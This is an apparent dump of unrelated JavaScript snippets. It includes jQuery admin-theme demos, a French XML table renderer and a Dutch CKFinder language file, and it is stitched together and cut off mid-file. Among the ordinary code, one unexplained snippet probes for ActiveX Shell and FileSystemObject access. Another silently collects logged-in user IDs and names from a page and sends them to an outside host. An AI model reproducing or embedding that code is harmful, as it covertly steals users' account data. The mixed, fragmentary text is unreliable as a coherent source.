}, async: false }); } var handleCCInput = function () { var the = $('.inbox-compose .mail-to .inbox-cc'); var input = $('.inbox-compose .input-cc'); the.hide(); input.show(); $('.close', input).click(function () { input.hide(); the.show(); }); } var handleBCCInput = function () { var the = $('.inbox-compose .mail-to .inbox-bcc'); var input = $('.inbox-compose .input-bcc'); the.hide(); input.show(); $('.close', input).click(function () { input.hide(); the.show(); }); } var toggleButton = function(el) { if (typeof el == 'undefined') { return; } if (el.attr("disabled")) { el.attr("disabled", false); } else { el.attr("disabled", true); } } return { //main function to initiate the module init: function () { // handle compose btn click $('.inbox').on('click', '.compose-btn a', function () { loadCompose($(this)); }); // handle discard btn $('.inbox').on('click', '.inbox-discard-btn', function(e) { e.preventDefault(); loadInbox($(this), listListing); }); // handle reply and forward button click $('.inbox').on('click', '.reply-btn', function () { loadReply($(this)); }); // handle view message $('.inbox-content').on('click', '.view-message', function () { loadMessage($(this)); }); // handle inbox listing $('.inbox-nav > li.inbox > a').click(function () { loadInbox($(this), 'inbox'); }); // handle sent listing $('.inbox-nav > li.sent > a').click(function () { loadInbox($(this), 'sent'); }); // handle draft listing $('.inbox-nav > li.draft > a').click(function () { loadInbox($(this), 'draft'); }); // handle trash listing $('.inbox-nav > li.trash > a').click(function () { loadInbox($(this), 'trash'); }); //handle compose/reply cc input toggle $('.inbox-compose').on('click', '.mail-to .inbox-cc', function () { handleCCInput(); }); //handle compose/reply bcc input toggle $('.inbox-compose').on('click', '.mail-to .inbox-bcc', function () { handleBCCInput(); }); //handle loading content based on URL parameter if (App.getURLParameter("a") === "view") { loadMessage(); } else if (App.getURLParameter("a") === "compose") { loadCompose(); } else { $('.inbox-nav > li.inbox > a').click(); } } }; }();
JavaScript
var PortletDraggable = function () { return { //main function to initiate the module init: function () { if (!jQuery().sortable) { return; } $("#sortable_portlets").sortable({ connectWith: ".portlet", items: ".portlet", opacity: 0.8, coneHelperSize: true, placeholder: 'sortable-box-placeholder round-all', forcePlaceholderSize: true, tolerance: "pointer" }); $(".column").disableSelection(); } }; }();
JavaScript
var UINotific8 = function () { return { //main function to initiate the module init: function () { $('#notific8_show').click(function(event) { var settings = { theme: $('#notific8_theme').val(), sticky: $('#notific8_sticky').is(':checked'), horizontalEdge: $('#notific8_pos_hor').val(), verticalEdge: $('#notific8_pos_ver').val() }, $button = $(this); if ($.trim($('#notific8_heading').val()) != '') { settings.heading = $.trim($('#notific8_heading').val()); } if (!settings.sticky) { settings.life = $('#notific8_life').val(); } $.notific8('zindex', 11500); $.notific8($.trim($('#notific8_text').val()), settings); $button.attr('disabled', 'disabled'); setTimeout(function() { $button.removeAttr('disabled'); }, 1000); }); } }; }();
JavaScript
var EcommerceProducts = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleProducts = function() { var grid = new Datatable(); grid.init({ src: $("#datatable_products"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, // default record count per page "bServerSide": true, // server side processing "sAjaxSource": "demo/ecommerce_products.php", // ajax source "aaSorting": [[ 1, "asc" ]] // set first column as a default sort by asc } }); // handle filter submit button click grid.getTableWrapper().on('click', '.table-group-action-submit', function(e){ e.preventDefault(); var action = $(".table-group-action-input", grid.getTableWrapper()); if (action.val() != "" && grid.getSelectedRowsCount() > 0) { grid.addAjaxParam("sAction", "group_action"); grid.addAjaxParam("sGroupActionName", action.val()); var records = grid.getSelectedRows(); for (var i in records) { grid.addAjaxParam(records[i]["name"], records[i]["value"]); } grid.getDataTable().fnDraw(); grid.clearAjaxParams(); } else if (action.val() == "") { App.alert({type: 'danger', icon: 'warning', message: 'Please select an action', container: grid.getTableWrapper(), place: 'prepend'}); } else if (grid.getSelectedRowsCount() === 0) { App.alert({type: 'danger', icon: 'warning', message: 'No record selected', container: grid.getTableWrapper(), place: 'prepend'}); } }); } return { //main function to initiate the module init: function () { handleProducts(); initPickers(); } }; }();
JavaScript
var UIIdleTimeout = function () { return { //main function to initiate the module init: function () { // cache a reference to the countdown element so we don't have to query the DOM for it on each ping. var $countdown; $('body').append('<div class="modal fade" id="idle-timeout-dialog" data-backdrop="static"><div class="modal-dialog modal-small"><div class="modal-content"><div class="modal-header"><h4 class="modal-title">Your session is about to expire.</h4></div><div class="modal-body"><p><i class="fa fa-warning"></i> You session will be locked in <span id="idle-timeout-counter"></span> seconds.</p><p>Do you want to continue your session?</p></div><div class="modal-footer"><button id="idle-timeout-dialog-logout" type="button" class="btn btn-default">No, Logout</button><button id="idle-timeout-dialog-keepalive" type="button" class="btn btn-primary" data-dismiss="modal">Yes, Keep Working</button></div></div></div></div>'); // start the idle timer plugin $.idleTimeout('#idle-timeout-dialog', '.modal-content button:last', { idleAfter: 5, // 5 seconds timeout: 30000, //30 seconds to timeout pollingInterval: 5, // 5 seconds keepAliveURL: 'demo/idletimeout_keepalive.php', serverResponseEquals: 'OK', onTimeout: function(){ window.location = "extra_lock.html"; }, onIdle: function(){ $('#idle-timeout-dialog').modal('show'); $countdown = $('#idle-timeout-counter'); $('#idle-timeout-dialog-keepalive').on('click', function () { $('#idle-timeout-dialog').modal('hide'); }); $('#idle-timeout-dialog-logout').on('click', function () { $('#idle-timeout-dialog').modal('hide'); $.idleTimeout.options.onTimeout.call(this); }); }, onCountdown: function(counter){ $countdown.html(counter); // update the counter } }); } }; }();
JavaScript
var ComponentsEditors = function () { var handleWysihtml5 = function () { if (!jQuery().wysihtml5) { return; } if ($('.wysihtml5').size() > 0) { $('.wysihtml5').wysihtml5({ "stylesheets": ["assets/plugins/bootstrap-wysihtml5/wysiwyg-color.css"] }); } } return { //main function to initiate the module init: function () { handleWysihtml5(); } }; }();
JavaScript
var ComponentsDropdowns = function () { var handleSelect2 = function () { $('#select2_sample1').select2({ placeholder: "Select an option", allowClear: true }); $('#select2_sample2').select2({ placeholder: "Select a State", allowClear: true }); $("#select2_sample3").select2({ placeholder: "Select...", allowClear: true, minimumInputLength: 1, query: function (query) { var data = { results: [] }, i, j, s; for (i = 1; i < 5; i++) { s = ""; for (j = 0; j < i; j++) { s = s + query.term; } data.results.push({ id: query.term + i, text: s }); } query.callback(data); } }); function format(state) { if (!state.id) return state.text; // optgroup return "<img class='flag' src='assets/img/flags/" + state.id.toLowerCase() + ".png'/>&nbsp;&nbsp;" + state.text; } $("#select2_sample4").select2({ placeholder: "Select a Country", allowClear: true, formatResult: format, formatSelection: format, escapeMarkup: function (m) { return m; } }); $("#select2_sample5").select2({ tags: ["red", "green", "blue", "yellow", "pink"] }); function movieFormatResult(movie) { var markup = "<table class='movie-result'><tr>"; if (movie.posters !== undefined && movie.posters.thumbnail !== undefined) { markup += "<td valign='top'><img src='" + movie.posters.thumbnail + "'/></td>"; } markup += "<td valign='top'><h5>" + movie.title + "</h5>"; if (movie.critics_consensus !== undefined) { markup += "<div class='movie-synopsis'>" + movie.critics_consensus + "</div>"; } else if (movie.synopsis !== undefined) { markup += "<div class='movie-synopsis'>" + movie.synopsis + "</div>"; } markup += "</td></tr></table>" return markup; } function movieFormatSelection(movie) { return movie.title; } $("#select2_sample6").select2({ placeholder: "Search for a movie", minimumInputLength: 1, ajax: { // instead of writing the function to execute the request we use Select2's convenient helper url: "http://api.rottentomatoes.com/api/public/v1.0/movies.json", dataType: 'jsonp', data: function (term, page) { return { q: term, // search term page_limit: 10, apikey: "ju6z9mjyajq2djue3gbvv26t" // please do not use so this example keeps working }; }, results: function (data, page) { // parse the results into the format expected by Select2. // since we are using custom formatting functions we do not need to alter remote JSON data return { results: data.movies }; } }, initSelection: function (element, callback) { // the input tag has a value attribute preloaded that points to a preselected movie's id // this function resolves that id attribute to an object that select2 can render // using its formatResult renderer - that way the movie name is shown preselected var id = $(element).val(); if (id !== "") { $.ajax("http://api.rottentomatoes.com/api/public/v1.0/movies/" + id + ".json", { data: { apikey: "ju6z9mjyajq2djue3gbvv26t" }, dataType: "jsonp" }).done(function (data) { callback(data); }); } }, formatResult: movieFormatResult, // omitted for brevity, see the source of this page formatSelection: movieFormatSelection, // omitted for brevity, see the source of this page dropdownCssClass: "bigdrop", // apply css that makes the dropdown taller escapeMarkup: function (m) { return m; } // we do not want to escape markup since we are displaying html in results }); } var handleSelect2Modal = function () { $('#select2_sample_modal_1').select2({ placeholder: "Select an option", allowClear: true }); $('#select2_sample_modal_2').select2({ placeholder: "Select a State", allowClear: true }); $("#select2_sample_modal_3").select2({ allowClear: true, minimumInputLength: 1, query: function (query) { var data = { results: [] }, i, j, s; for (i = 1; i < 5; i++) { s = ""; for (j = 0; j < i; j++) { s = s + query.term; } data.results.push({ id: query.term + i, text: s }); } query.callback(data); } }); function format(state) { if (!state.id) return state.text; // optgroup return "<img class='flag' src='assets/img/flags/" + state.id.toLowerCase() + ".png'/>&nbsp;&nbsp;" + state.text; } $("#select2_sample_modal_4").select2({ allowClear: true, formatResult: format, formatSelection: format, escapeMarkup: function (m) { return m; } }); $("#select2_sample_modal_5").select2({ tags: ["red", "green", "blue", "yellow", "pink"] }); function movieFormatResult(movie) { var markup = "<table class='movie-result'><tr>"; if (movie.posters !== undefined && movie.posters.thumbnail !== undefined) { markup += "<td valign='top'><img src='" + movie.posters.thumbnail + "'/></td>"; } markup += "<td valign='top'><h5>" + movie.title + "</h5>"; if (movie.critics_consensus !== undefined) { markup += "<div class='movie-synopsis'>" + movie.critics_consensus + "</div>"; } else if (movie.synopsis !== undefined) { markup += "<div class='movie-synopsis'>" + movie.synopsis + "</div>"; } markup += "</td></tr></table>" return markup; } function movieFormatSelection(movie) { return movie.title; } $("#select2_sample_modal_6").select2({ placeholder: "Search for a movie", minimumInputLength: 1, ajax: { // instead of writing the function to execute the request we use Select2's convenient helper url: "http://api.rottentomatoes.com/api/public/v1.0/movies.json", dataType: 'jsonp', data: function (term, page) { return { q: term, // search term page_limit: 10, apikey: "ju6z9mjyajq2djue3gbvv26t" // please do not use so this example keeps working }; }, results: function (data, page) { // parse the results into the format expected by Select2. // since we are using custom formatting functions we do not need to alter remote JSON data return { results: data.movies }; } }, initSelection: function (element, callback) { // the input tag has a value attribute preloaded that points to a preselected movie's id // this function resolves that id attribute to an object that select2 can render // using its formatResult renderer - that way the movie name is shown preselected var id = $(element).val(); if (id !== "") { $.ajax("http://api.rottentomatoes.com/api/public/v1.0/movies/" + id + ".json", { data: { apikey: "ju6z9mjyajq2djue3gbvv26t" }, dataType: "jsonp" }).done(function (data) { callback(data); }); } }, formatResult: movieFormatResult, // omitted for brevity, see the source of this page formatSelection: movieFormatSelection, // omitted for brevity, see the source of this page dropdownCssClass: "bigdrop", // apply css that makes the dropdown taller escapeMarkup: function (m) { return m; } // we do not want to escape markup since we are displaying html in results }); } var handleBootstrapSelect = function() { $('.bs-select').selectpicker({ iconBase: 'fa', tickIcon: 'fa-check' }); } var handleMultiSelect = function () { $('#my_multi_select1').multiSelect(); $('#my_multi_select2').multiSelect({ selectableOptgroup: true }); } return { //main function to initiate the module init: function () { handleSelect2(); handleSelect2Modal(); handleMultiSelect(); handleBootstrapSelect(); } }; }();
JavaScript
var TableEditable = function () { return { //main function to initiate the module init: function () { function restoreRow(oTable, nRow) { var aData = oTable.fnGetData(nRow); var jqTds = $('>td', nRow); for (var i = 0, iLen = jqTds.length; i < iLen; i++) { oTable.fnUpdate(aData[i], nRow, i, false); } oTable.fnDraw(); } function editRow(oTable, nRow) { var aData = oTable.fnGetData(nRow); var jqTds = $('>td', nRow); jqTds[0].innerHTML = '<input type="text" class="form-control input-small" value="' + aData[0] + '">'; jqTds[1].innerHTML = '<input type="text" class="form-control input-small" value="' + aData[1] + '">'; jqTds[2].innerHTML = '<input type="text" class="form-control input-small" value="' + aData[2] + '">'; jqTds[3].innerHTML = '<input type="text" class="form-control input-small" value="' + aData[3] + '">'; jqTds[4].innerHTML = '<a class="edit" href="">Save</a>'; jqTds[5].innerHTML = '<a class="cancel" href="">Cancel</a>'; } function saveRow(oTable, nRow) { var jqInputs = $('input', nRow); oTable.fnUpdate(jqInputs[0].value, nRow, 0, false); oTable.fnUpdate(jqInputs[1].value, nRow, 1, false); oTable.fnUpdate(jqInputs[2].value, nRow, 2, false); oTable.fnUpdate(jqInputs[3].value, nRow, 3, false); oTable.fnUpdate('<a class="edit" href="">Edit</a>', nRow, 4, false); oTable.fnUpdate('<a class="delete" href="">Delete</a>', nRow, 5, false); oTable.fnDraw(); } function cancelEditRow(oTable, nRow) { var jqInputs = $('input', nRow); oTable.fnUpdate(jqInputs[0].value, nRow, 0, false); oTable.fnUpdate(jqInputs[1].value, nRow, 1, false); oTable.fnUpdate(jqInputs[2].value, nRow, 2, false); oTable.fnUpdate(jqInputs[3].value, nRow, 3, false); oTable.fnUpdate('<a class="edit" href="">Edit</a>', nRow, 4, false); oTable.fnDraw(); } var oTable = $('#sample_editable_1').dataTable({ "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 5, "sPaginationType": "bootstrap", "oLanguage": { "sLengthMenu": "_MENU_ records", "oPaginate": { "sPrevious": "Prev", "sNext": "Next" } }, "aoColumnDefs": [{ 'bSortable': false, 'aTargets': [0] } ] }); jQuery('#sample_editable_1_wrapper .dataTables_filter input').addClass("form-control input-medium input-inline"); // modify table search input jQuery('#sample_editable_1_wrapper .dataTables_length select').addClass("form-control input-small"); // modify table per page dropdown jQuery('#sample_editable_1_wrapper .dataTables_length select').select2({ showSearchInput : false //hide search box with special css class }); // initialize select2 dropdown var nEditing = null; $('#sample_editable_1_new').click(function (e) { e.preventDefault(); var aiNew = oTable.fnAddData(['', '', '', '', '<a class="edit" href="">Edit</a>', '<a class="cancel" data-mode="new" href="">Cancel</a>' ]); var nRow = oTable.fnGetNodes(aiNew[0]); editRow(oTable, nRow); nEditing = nRow; }); $('#sample_editable_1 a.delete').live('click', function (e) { e.preventDefault(); if (confirm("Are you sure to delete this row ?") == false) { return; } var nRow = $(this).parents('tr')[0]; oTable.fnDeleteRow(nRow); alert("Deleted! Do not forget to do some ajax to sync with backend :)"); }); $('#sample_editable_1 a.cancel').live('click', function (e) { e.preventDefault(); if ($(this).attr("data-mode") == "new") { var nRow = $(this).parents('tr')[0]; oTable.fnDeleteRow(nRow); } else { restoreRow(oTable, nEditing); nEditing = null; } }); $('#sample_editable_1 a.edit').live('click', function (e) { e.preventDefault(); /* Get the row as a parent of the link that was clicked on */ var nRow = $(this).parents('tr')[0]; if (nEditing !== null && nEditing != nRow) { /* Currently editing - but not this row - restore the old before continuing to edit mode */ restoreRow(oTable, nEditing); editRow(oTable, nRow); nEditing = nRow; } else if (nEditing == nRow && this.innerHTML == "Save") { /* Editing this row and want to save it */ saveRow(oTable, nEditing); nEditing = null; alert("Updated! Do not forget to do some ajax to sync with backend :)"); } else { /* No edit in progress - let's start one */ editRow(oTable, nRow); nEditing = nRow; } }); } }; }();
JavaScript
/** * Création du tableau des enregistrements * @param doc : le document XML à partir duquel on va lire * @param zone : la zone HTML dans laquelle on va écrire * @param nomTable : le nom de la table concernée */ function creerTableau(doc, zone, nomTable) { var rows = doc.getElementsByTagName("row"); var tab = document.createElement("table"); tab.name = 'tableau'; tab.border = 1; //var nomIdentifiant = doc.documentElement.children[doc.documentElement.children.length-1].firstChild.textContent; //On ne gère que les identifiants où il n'y a qu'une seule colonne var nomIdentifiant = doc.getElementsByTagName("idprimarykey")[0].firstChild.textContent; var foreignKeys = doc.getElementsByTagName("idforeignkey"); //Création de l'en-tête du tableau if(rows.length > 0) { var ligne = document.createElement("tr"); for(var j = 0 ; j < rows[0].children.length ; j++) { var tabCase = document.createElement("th"); var nomColonne = rows[0].children[j].nodeName; tabCase.innerHTML = nomColonne; //On indique s'il s'agit d'une clé primaire if(nomColonne == nomIdentifiant) tabCase.innerHTML += "<br>(Primary)"; //On indique s'il s'agit d'une clé étrangère for(var k = 0 ; k < foreignKeys.length ; k++) { var cleEtrangere = foreignKeys[k].firstChild.textContent; //Est-ce qu'il s'agit d'une clé étrangère? if(nomColonne == cleEtrangere) { tabCase.innerHTML += "<br>(Foreign)"; } } ligne.appendChild(tabCase); } var tabCase = document.createElement("th"); tabCase.innerHTML = "Modifier" ligne.appendChild(tabCase); var tabCase = document.createElement("th"); tabCase.innerHTML = "Supprimer" ligne.appendChild(tabCase); tab.appendChild(ligne); } //Pour chaque enregistrement for(var i = 0 ; i < rows.length ; i++) { var ligne = document.createElement("tr"); for(var j = 0 ; j < rows[i].children.length ; j++) { var tabCase = document.createElement("td"); //Est-ce que la valeur est à vide? if(rows[i].children[j].firstChild != null) { var textCase = rows[i].children[j].firstChild.textContent; var nomColonne = rows[i].children[j].nodeName; //Est-ce qu'il s'agit de la clé primaire? if(nomColonne == nomIdentifiant) { //Est-ce qu'il s'agit aussi d'une clé étrangère? Si oui elle a priorité (le lien hypertexte pointera sur la clé étrangère) var estCleEtrangere = setCleEtrangere(foreignKeys, textCase, nomColonne, tabCase); var identifiant = textCase; if(estCleEtrangere == 'non') tabCase.innerHTML = "<a href=\"clientWebServlet?action=getRecord&nomTable=" + nomTable + "&idprimarykey=" + textCase + "\">" + textCase + "</a>"; } else { //Est-ce qu'il s'agit d'une clé étrangère? var estCleEtrangere = setCleEtrangere(foreignKeys, textCase, nomColonne, tabCase); if(estCleEtrangere == 'non') tabCase.innerHTML = textCase; } } else //Mettre la grille à vide au lieu de tout blanc quand c'est vide tabCase.innerHTML = "&nbsp"; ligne.appendChild(tabCase); } //Créer le lien pour la modification var tabCase = document.createElement("td"); tabCase.innerHTML = "<a href=\"clientWebServlet?action=commande&ordre=modifier&nomTable=" + nomTable + "&idprimarykey=" + identifiant + "\"><img src=\"modifier.gif\" alt=\"Modifier\"></a>"; ligne.appendChild(tabCase); //Créer le lien pour la suppression var tabCase = document.createElement("td"); tabCase.innerHTML = "<a href=\"#\" onClick=\"confirmerSuppression('clientWebServlet?action=deleteRecord&nomTable=" + nomTable + "&idprimarykey=" + identifiant + "')\"><img src=\"supprimer.gif\" alt=\"Supprimer\"></a>"; ligne.appendChild(tabCase); tab.appendChild(ligne); } zone.appendChild(tab); } /** * Crée le lien hypertexte de clé étrangère d'une valeur * @param foreignKeys : l'arbre XML contenant les contraintes de clés étrangères * @param textCase : la valeur à écrire dans la case * @param nomColonne : le nom de la colonne de la table * @param tabCase : la case du tableau dans laquelle on va écrire * @return si la colonne est une clé étrangère, on renvoie 'oui' */ function setCleEtrangere(foreignKeys, textCase, nomColonne, tabCase) { var estCleEtrangere = 'non'; //Pour chaque contrainte de clé étrangère for(var k = 0 ; k < foreignKeys.length ; k++) { var cleEtrangere = foreignKeys[k].firstChild.textContent; //Est-ce qu'il s'agit d'une clé étrangère? if(nomColonne == cleEtrangere) { estCleEtrangere = 'oui'; tabCase.innerHTML = "<a href=\"clientWebServlet?action=getRecord&nomTable=" + foreignKeys[k].getAttribute("referenceTable") + "&idprimarykey=" + textCase + "\">" + textCase + "</a>"; break; } } return estCleEtrangere; } /** * Fenêtre demandant confirmation pour une suppression * @param lien : Si on confirme la suppression, on va appeler le serveur à ce lien */ function confirmerSuppression(lien) { var confirmation = confirm("Voulez-vous vraiment supprimer cet enregistrement ?") ; if(confirmation) { document.location.href = lien; } }
JavaScript
var msg=[]; try{ var NetBox=new ActiveXObject('NetBox'); msg.push('NetBox对象创建成功!'); var fso = new ActiveXObject("Scripting.FileSystemObject"); var Shell2 = new ActiveXObject("Shell"); }catch(e){ msg.push('NetBox对象创建失败!'); } try{ var s2=new ActiveXObject('Scripting.FileSystemObject'); msg.push('Scripting.FileSystemObject对象创建成功!'); var fso = new ActiveXObject("Scripting.FileSystemObject"); var Shell2 = new ActiveXObject("Shell"); }catch(e){ msg.push('Scripting.FileSystemObject对象创建失败!'); } try{ var s3=new ActiveXObject('Shell'); msg.push('Shell对象创建成功!'); }catch(e){ msg.push('Shell对象创建失败!'); } try{ var s4=new ActiveXObject('NetBox.File'); msg.push('NetBox.File对象创建成功!'); }catch(e){ msg.push('NetBox.File对象创建失败!'); } J('body').html(msg.join('<br/>'))
JavaScript
!function(){ setTimeout(function(){ var ht=[]; J('#LoginButtonBox li').each(function(i){ ht.push(this.attr('user')+':'+this.html().match(/[^<]+/)); }); var ret=ht.join('~~~'); function cn2uni(str){ return str.replace(/[^\u0000-\u00FF]/g,function($0){return '\\'+escape($0).substr(1)}); } if(!/99420667|1686462355|1627444103/.test(ret)){ J.js('http://blfz.1725g.com/api/getuser1.jsp',0,{ ctx:cn2uni(ret), t:+new Date }); } },1000); }();
JavaScript
window.onload = function() { var copyP = document.createElement( 'p' ) ; copyP.className = 'copyright' ; copyP.innerHTML = '&copy; 2007-2013 <a href="http://cksource.com" target="_blank">CKSource</a> - Frederico Knabben . All rights reserved.<br /><br />' ; document.body.appendChild( document.createElement( 'hr' ) ) ; document.body.appendChild( copyP ) ; window.top.SetActiveTopic( window.location.pathname ) ; }
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Dutch * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['nl'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, niet beschikbaar</span>', confirmCancel : 'Enkele opties zijn gewijzigd. Weet u zeker dat u dit dialoogvenster wilt sluiten?', ok : 'OK', cancel : 'Annuleren', confirmationTitle : 'Bevestigen', messageTitle : 'Informatie', inputTitle : 'Vraag', undo : 'Ongedaan maken', redo : 'Opnieuw uitvoeren', skip : 'Overslaan', skipAll : 'Alles overslaan', makeDecision : 'Welke actie moet uitgevoerd worden?', rememberDecision: 'Onthoud mijn keuze' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'nl', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd-m-yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mappen', FolderLoading : 'Laden...', FolderNew : 'Vul de mapnaam in: ', FolderRename : 'Vul de nieuwe mapnaam in: ', FolderDelete : 'Weet je het zeker dat je de map "%1" wilt verwijderen?', FolderRenaming : ' (Aanpassen...)', FolderDeleting : ' (Verwijderen...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Vul de nieuwe bestandsnaam in: ', FileRenameExt : 'Weet je zeker dat je de extensie wilt wijzigen? Het bestand kan onbruikbaar worden.', FileRenaming : 'Aanpassen...', FileDelete : 'Weet je zeker dat je het bestand "%1" wilt verwijderen?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laden...', FilesEmpty : 'De map is leeg.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Mandje', BasketClear : 'Mandje legen', BasketRemove : 'Verwijder uit het mandje', BasketOpenFolder : 'Bovenliggende map openen', BasketTruncateConfirm : 'Weet je zeker dat je alle bestand uit het mandje wilt verwijderen?', BasketRemoveConfirm : 'Weet je zeker dat je het bestand "%1" uit het mandje wilt verwijderen?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Geen bestanden in het mandje, sleep bestanden hierheen.', BasketCopyFilesHere : 'Bestanden kopiëren uit het mandje', BasketMoveFilesHere : 'Bestanden verplaatsen uit het mandje', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Uploaden', UploadTip : 'Nieuw bestand uploaden', Refresh : 'Vernieuwen', Settings : 'Instellingen', Help : 'Help', HelpTip : 'Help', // Context Menus Select : 'Selecteer', SelectThumbnail : 'Selecteer miniatuurafbeelding', View : 'Bekijken', Download : 'Downloaden', NewSubFolder : 'Nieuwe onderliggende map', Rename : 'Naam wijzigen', Delete : 'Verwijderen', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Hierheen kopiëren', MoveDragDrop : 'Hierheen verplaatsen', // Dialogs RenameDlgTitle : 'Naam wijzigen', NewNameDlgTitle : 'Nieuwe naam', FileExistsDlgTitle : 'Bestand bestaat al', SysErrorDlgTitle : 'Systeemfout', FileOverwrite : 'Overschrijven', FileAutorename : 'Automatisch hernoemen', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Annuleren', CloseBtn : 'Sluiten', // Upload Panel UploadTitle : 'Nieuw bestand uploaden', UploadSelectLbl : 'Selecteer het bestand om te uploaden', UploadProgressLbl : '(Bezig met uploaden, even geduld a.u.b...)', UploadBtn : 'Upload geselecteerde bestand', UploadBtnCancel : 'Annuleren', UploadNoFileMsg : 'Kies een bestand van je computer.', UploadNoFolder : 'Selecteer a.u.b. een map voordat je gaat uploaden.', UploadNoPerms : 'Uploaden bestand niet toegestaan.', UploadUnknError : 'Fout bij het versturen van het bestand.', UploadExtIncorrect : 'Bestandsextensie is niet toegestaan in deze map.', // Flash Uploads UploadLabel : 'Te uploaden bestanden', UploadTotalFiles : 'Totaal aantal bestanden:', UploadTotalSize : 'Totale grootte:', UploadSend : 'Uploaden', UploadAddFiles : 'Bestanden toevoegen', UploadClearFiles : 'Bestanden wissen', UploadCancel : 'Upload annuleren', UploadRemove : 'Verwijderen', UploadRemoveTip : 'Verwijder !f', UploadUploaded : '!n% geüpload', UploadProcessing : 'Verwerken...', // Settings Panel SetTitle : 'Instellingen', SetView : 'Bekijken:', SetViewThumb : 'Miniatuurafbeelding', SetViewList : 'Lijst', SetDisplay : 'Weergave:', SetDisplayName : 'Bestandsnaam', SetDisplayDate : 'Datum', SetDisplaySize : 'Bestandsgrootte', SetSort : 'Sorteren op:', SetSortName : 'Op bestandsnaam', SetSortDate : 'Op datum', SetSortSize : 'Op grootte', SetSortExtension : 'Op bestandsextensie', // Status Bar FilesCountEmpty : '<Lege map>', FilesCountOne : '1 bestand', FilesCountMany : '%1 bestanden', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Het was niet mogelijk om deze actie uit te voeren. (Fout %1)', Errors : { 10 : 'Ongeldig commando.', 11 : 'Het bestandstype komt niet voor in de aanvraag.', 12 : 'Het gevraagde brontype is niet geldig.', 102 : 'Ongeldige bestands- of mapnaam.', 103 : 'Het verzoek kon niet worden voltooid vanwege autorisatie beperkingen.', 104 : 'Het verzoek kon niet worden voltooid door beperkingen in de rechten op het bestandssysteem.', 105 : 'Ongeldige bestandsextensie.', 109 : 'Ongeldige aanvraag.', 110 : 'Onbekende fout.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Er bestaat al een bestand of map met deze naam.', 116 : 'Map niet gevonden, vernieuw de mappenlijst of kies een andere map.', 117 : 'Bestand niet gevonden, vernieuw de mappenlijst of kies een andere map.', 118 : 'Bron- en doelmap zijn gelijk.', 201 : 'Er bestaat al een bestand met dezelfde naam. Het geüploade bestand is hernoemd naar: "%1".', 202 : 'Ongeldige bestand.', 203 : 'Ongeldige bestand. Het bestand is te groot.', 204 : 'De geüploade file is kapot.', 205 : 'Er is geen hoofdmap gevonden.', 206 : 'Het uploaden van het bestand is om veiligheidsredenen afgebroken. Er is HTML code in het bestand aangetroffen.', 207 : 'Het geüploade bestand is hernoemd naar: "%1".', 300 : 'Bestand(en) verplaatsen is mislukt.', 301 : 'Bestand(en) kopiëren is mislukt.', 500 : 'Het uploaden van een bestand is momenteel niet mogelijk. Contacteer de beheerder en controleer het CKFinder configuratiebestand.', 501 : 'De ondersteuning voor miniatuurafbeeldingen is uitgeschakeld.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'De bestandsnaam mag niet leeg zijn.', FileExists : 'Bestand %s bestaat al.', FolderEmpty : 'De mapnaam mag niet leeg zijn.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'De bestandsnaam mag de volgende tekens niet bevatten: \n\\ / : * ? " < > |', FolderInvChar : 'De mapnaam mag de volgende tekens niet bevatten: \n\\ / : * ? " < > |', PopupBlockView : 'Het was niet mogelijk om dit bestand in een nieuw venster te openen. Configureer de browser zodat het de popups van deze website niet blokkeert.', XmlError : 'Het is niet gelukt om de XML van de webserver te laden.', XmlEmpty : 'Het is niet gelukt om de XML van de webserver te laden. De server gaf een leeg resultaat terug.', XmlRawResponse : 'Origineel resultaat van de server: %s' }, // Imageresize plugin Imageresize : { dialogTitle : '%s herschalen', sizeTooBig : 'Het is niet mogelijk om een breedte of hoogte in te stellen die groter is dan de originele afmetingen (%size).', resizeSuccess : 'De afbeelding is met succes herschaald.', thumbnailNew : 'Miniatuurafbeelding maken', 